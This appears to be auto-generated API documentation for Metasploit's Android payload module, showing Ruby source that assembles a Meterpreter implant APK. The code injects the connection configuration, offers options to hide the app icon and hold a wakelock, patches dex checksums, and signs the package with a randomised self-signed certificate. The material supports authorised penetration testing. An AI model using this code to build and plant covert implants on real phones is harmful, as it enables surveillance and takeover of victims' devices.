Module: Msf::Payload::Android

Includes:
TransportConfig, UUID::Options
Included in:
MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/android.rb

Defined Under Namespace

Modules: MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #initialize, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Methods included from Pingback::Options

#initialize

Instance Method Details

#fix_dex_header(dexfile) ⇒ Object

Fix the dex header checksum and signature source.android.com/tech/dalvik/dex-format.html


16
17
18
19
20
21
# File 'lib/msf/core/payload/android.rb', line 16

def fix_dex_header(dexfile)
  dexfile = dexfile.unpack('a8LH40a*')
  dexfile[2] = Digest::SHA1.hexdigest(dexfile[3])
  dexfile[1] = Zlib.adler32(dexfile[2..-1].pack('H40a*'))
  dexfile.pack('a8LH40a*')
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String


37
38
39
# File 'lib/msf/core/payload/android.rb', line 37

def generate(opts={})
  generate_jar(opts).pack
end

#generate_config(opts = {}) ⇒ Object


45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# File 'lib/msf/core/payload/android.rb', line 45

def generate_config(opts={})
  opts[:uuid] ||= generate_payload_uuid
  ds = opts[:datastore] || datastore

  config_opts = {
    ascii_str:  true,
    arch:       opts[:uuid].arch,
    expiration: ds['SessionExpirationTimeout'].to_i,
    uuid:       opts[:uuid],
    transports: opts[:transport_config] || [transport_config(opts)],
    stageless:  opts[:stageless] == true
  }

  config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
  flags = 0
  flags |= 1 if opts[:stageless]
  flags |= 2 if ds['AndroidMeterpreterDebug']
  flags |= 4 if ds['AndroidWakelock']
  flags |= 8 if ds['AndroidHideAppIcon']
  config[0] = flags.chr
  config
end

#generate_default_stage(opts = {}) ⇒ Object


30
31
32
# File 'lib/msf/core/payload/android.rb', line 30

def generate_default_stage(opts={})
  ''
end

#generate_jar(opts = {}) ⇒ Object


111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
# File 'lib/msf/core/payload/android.rb', line 111

def generate_jar(opts={})
  config = generate_config(opts)
  if opts[:stageless]
    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
    # Add stageless classname at offset 8000
    config += "\x00" * (8000 - config.size)
    config += 'com.metasploit.meterpreter.AndroidMeterpreter'
  else
    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
  end

  config += "\x00" * (8195 - config.size)
  classes.gsub!("\xde\xad\xba\xad" + "\x00" * 8191, config)

  jar = Rex::Zip::Jar.new
  files = [
    [ "AndroidManifest.xml" ],
    [ "resources.arsc" ]
  ]
  jar.add_files(files, MetasploitPayloads.path("android", "apk"))
  jar.add_file("classes.dex", fix_dex_header(classes))
  jar.build_manifest

  sign_jar(jar)

  jar
end

#generate_stage(opts = {}) ⇒ Object

We could compile the .class files with dx here


26
27
28
# File 'lib/msf/core/payload/android.rb', line 26

def generate_stage(opts={})
  ''
end

#java_string(str) ⇒ Object


41
42
43
# File 'lib/msf/core/payload/android.rb', line 41

def java_string(str)
  [str.length].pack("N") + str
end

#sign_jar(jar) ⇒ Object


68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
# File 'lib/msf/core/payload/android.rb', line 68

def sign_jar(jar)
  x509_name = OpenSSL::X509::Name.parse(
    "C=US/O=Android/CN=Android Debug"
  )

  key = signing_key

  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = x509_name
  cert.issuer = x509_name
  cert.public_key = key.public_key

  # Some time within the last 3 years
  cert.not_before = Time.now - rand(3600 * 24 * 365 * 3)

  # From http://developer.android.com/tools/publishing/app-signing.html
  # """
  # A validity period of more than 25 years is recommended.
  #
  # If you plan to publish your application(s) on Google Play, note
  # that a validity period ending after 22 October 2033 is a
  # requirement. You cannot upload an application if it is signed
  # with a key whose validity expires before that date.
  # """
  #
  # 32-bit Ruby (and 64-bit Ruby on Windows) cannot deal with
  # certificate not_after times later than Jan 1st 2038, since long is 32-bit.
  # Set not_after to a random time 2~ years before the first bad date.
  #
  # FIXME: this will break again randomly starting in late 2033, hopefully
  # all 32-bit systems will be dead by then...
  #
  # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
  cert.not_after = Time.at(0x78045d81 + rand(0x7fffffff - 0x78045d81))

  # If this line is left out, signature verification fails on OSX.
  cert.sign(key, OpenSSL::Digest::SHA1.new)

  jar.sign(key, cert, [cert])
end

#signing_keyObject


8
9
10
# File 'lib/msf/core/payload/android.rb', line 8

def signing_key
  @@signing_key ||= OpenSSL::PKey::RSA.new(2048)
end